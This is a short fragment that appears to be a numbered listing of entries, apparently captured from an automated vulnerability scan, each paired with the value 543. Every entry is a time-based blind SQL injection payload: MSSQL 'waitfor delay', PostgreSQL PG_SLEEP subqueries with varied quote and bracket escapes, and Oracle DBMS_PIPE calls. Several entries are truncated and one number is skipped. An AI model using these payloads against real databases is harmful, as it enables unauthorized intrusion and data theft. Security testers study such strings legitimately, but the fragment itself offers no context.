737. 1 waitfor delay '0:0:15' --
543
738. oRwSFKeZ'; waitfor delay '0:0:15' --
543
739. -5 OR 171=(SELECT 171 FROM PG_SLEEP(15))--
543
740. -5) OR 806=(SELECT 806 FROM PG_SLEEP(15))--
543
741. -1)) OR 301=(SELECT 301 FROM PG_SLEEP(15))--
543
742. wpOgnTMc' OR 652=(SELECT 652 FROM PG_SLEEP(15))--
543
743. 7ePpnAyk') OR 522=(SELECT 522 FROM PG_SLEEP(15))--
543
744. kdR2BOGi')) OR 963=(SELECT 963 FROM PG_SLEEP(15))-
543
745. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(
543
747. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CH
543